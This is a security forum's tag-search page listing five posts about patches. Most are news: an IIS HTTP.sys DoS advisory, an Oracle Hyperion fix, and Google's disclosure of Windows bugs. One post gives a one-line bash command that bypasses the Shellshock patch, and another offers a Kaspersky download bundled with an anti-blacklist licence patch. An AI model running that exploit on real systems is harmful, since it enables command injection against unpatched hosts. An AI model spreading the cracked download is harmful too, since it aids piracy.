Search the Community
Showing results for tags 'patch'.
Found 5 results
-
Primit acum cateva momente de la compania de hosting: A recent exploit (CVE-2015-1635) affecting IIS was released yesterday. The exploit is a Denial of Service (DoS) vulnerability in the HTTP.sys. Versions of Windows that are vulnerable: Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2. HTTP.sys is used by any version of IIS running on one of these operating systems. A patch was released on Tuesday April 14th as part of Microsoft's Patch Tuesday, we recommend that you patch your IIS affected servers as soon as possible to avoid any potential DoS exploits. More detailed information of the vulnerability can be found here https://isc.sans.edu/diary/MS15-034%3A+HTTP.sys+%28IIS%29+DoS+And+Possible+Remote+Code+Execution.+PATCH+NOW/19583
-
Last patch bypass. rm -f echo && env -i X='() { (a)=>\' bash -c 'echo date'; cat echo Enjoy, depends on your OS maybe date could be $(date), Enjoy.
-
Oracle has issued a patch to fix several bugs in its Hyperion Product Management financial consolidation and reporting application that could be remotely exploited by hackers. Oracle's Proactive Support team announced the fixes, confirming that they address a number of flaws in the Hyperion Planning 11.1.2.2.x part of the application. The company does not offer firm details about the patch to non-registered customers, and had not responded to V3's request for further details at the time of publishing. However, TK Keanini, chief technology officer at Lancope, told V3 that the user base and nature of data handled within Hyperion means customers should be concerned by the flaw. "If you are running this software, it contains up-to-date business intelligence that you must keep secure. So if you are running this software it is incredibly important to keep it up to date and patched," he said. ? "Ask yourself this: if the information in your Hyperion system was compromised and posted to the internet for all to see, would you be OK with that? ? "The problem most companies face is that they sometimes don't know what is running on their network and this is problem number one that must be solved." Keanini explained that companies should patch the remote access vulnerabilities as soon as possible, but added that he has yet to see any evidence of the flaws being actively exploited by hackers. "This is not just one vulnerability but several. The CVEs that have remote access are the most important to fix first," he said. ? "I have not [seen the flaws being exploited] but when data is published to the internet, it is not like attackers take the time to show their timeline and the provenance of the data. ? "This is always interesting data but also a dangerous indicator because it is a lagging indicator at best." The Hyperion patch is one of many critical fixes issued by Oracle this year. The firm released a critical update in January addressing 167 vulnerabilities across hundreds of its products, including Java. Source -
Microsoft has heavily criticized Google and its 90-days security disclosure policy after the firm publicly revealed two zero-day vulnerabilities in Microsoft’s Windows 8.1 operating system one after one just days before Microsoft planned to issue a patch to kill the bugs. But, seemingly Google don't give a damn thought. Once again, Google has publicly disclosed a new serious vulnerability in Windows 7 and Windows 8.1 before Microsoft has been able to produce a patch, leaving users of both the operating systems exposed to hackers until next month, when the company plans to deliver a fix. DISCLOSURE OF UNPATCHED BUGS, GOOD OR BAD? Google’s tight 90-days disclosure policy seems to be a good move for all software vendors to patch their products before they get exploited by the hackers and cybercriminals. But at the same time, disclosing all critical bugs along with its technical details in the widely used operating system like Windows 7 and 8 doesn’t appears to be a right decision either. In both cases, the only one to suffer is the innocent users. The revelation of the security flaw was also a part Google's Project Zero, an initiative that identifies security holes in different software and calls on companies to publicly disclose and patch bugs within 90 days of discovering them. This time the search engine giant has discovered a flaw in the CryptProtectMemory memory-encrypting function found within Windows 7 and 8.1 and presents in both 32- and 64-bit architectures, which can accidentally disclose sensitive information or allow a miscreant to bypass security checks, apparently. MICROSOFT WILL DELIVER PATCH IN FEB, 2015 Google first notified Microsoft of the vulnerability in Windows 7 and 8.1 on October 17, 2014. Microsoft then confirmed the security issues on October 29 and said that its developers managed to reproduce the security hole. The patch for the vulnerability is scheduled for Feb. 10, next Patch Tuesday. The vulnerability was found by James Forshaw, who also discovered a "privilege elevation flaw" in Windows 8.1, which was disclosed earlier this week and drew strong criticism from Microsoft. The newly discovered bug actually resides in the CNG.sys implementation, which failed to run proper token checks. This is third time in less than a month when the Google’s Project Zero released details of the vulnerability in Microsoft’s operating system, following its 90-day public disclosure deadline policy. Few days ago, Google released details of a new privilege escalation bug in Microsoft's Windows 8.1 operating system just two days before Microsoft planned to patch the bug. Google vs. Microsoft — Google reveals Third unpatched Zero-Day Vulnerability in Windows - Hacker News -
Kaspersky Internet Security 2011 has everything that you need to stay safe and secure while you're surfing the web. It provides constant protection for you and your family – whether you work, bank, shop or play online.Stay ahead of the threats with Kaspersky Internet Security 2011! Kaspersky Internet Security 2011 stops your PC or Netbook being slowed down by cybercriminals and delivers unsurpassed on-line safety whilst protecting your files, music and photos from hackers. Download: http://hotfile.com/dl/100847687/d12da2d/Kaspersky_Internet_Security_2011_v11.0.1.400_Anti-Black_list_Patch.rar.html
